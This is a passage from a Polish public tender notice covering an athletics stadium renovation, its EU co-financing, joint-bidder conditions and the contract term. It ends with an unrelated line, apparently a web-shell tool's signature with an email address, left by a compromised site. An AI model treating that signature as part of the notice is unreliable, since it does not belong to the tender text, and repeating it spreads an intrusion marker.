<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Realizacja zadania inwestycyjnego pn. Modernizacja (remont) stadionu lekkoatletycznego będzie współfinansowana ze środków: 1) Europejskiego Funduszu Rozwoju Regionalnego oraz budżetu państwa w ramach Programu Operacyjnego Rozwój Polski Wschodniej 2007 - 2013, Osi Priorytetowej I Nowoczesna Gospodarka Działania I.3 Wspieranie Innowacji, projektu Regionalny Ośrodek Badań i Rozwoju w Białej Podlaskiej realizowanego na podstawie umowy nr POPW.01.03.00-06-009/09-00 z dnia 29.06.2009r. z późniejszymi zmianami, 2) Funduszu Rozwoju Kultury Fizycznej w ramach projektu Modernizacja (remont) stadionu lekkoatletycznego oraz boisk do gier zespołowych 3) Środków własnych Zamawiającego. 2. Informacja o zamiarze zawarcia umowy ramowej: nie dotyczy; 3. Dodatkowe informacje dotyczące warunków udziału w postępowaniu: 1/ W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać wykluczeniu z powodu niespełniania warunków, o których mowa w art. 24 ust. 1 ustawy Pzp, natomiast spełnianie warunków posiadania wiedzy i doświadczenia, dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, a także sytuacji ekonomicznej i finansowej, Wykonawcy wykazują łącznie (warunki te musi spełniać, co najmniej jeden z wykonawców samodzielnie albo mogą je spełniać wszyscy Wykonawcy łącznie); 2/ Termin realizacji zamówienia: 9 miesięcy od daty podpisania umowy. 3/ Uszczegółowienie warunku wiedzy i doświadczenia - nie należy podawać wartości wykonanych robót budowlanych w zamian za to podać długość wykonanej bieżni lekkoatletycznej w metrach.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com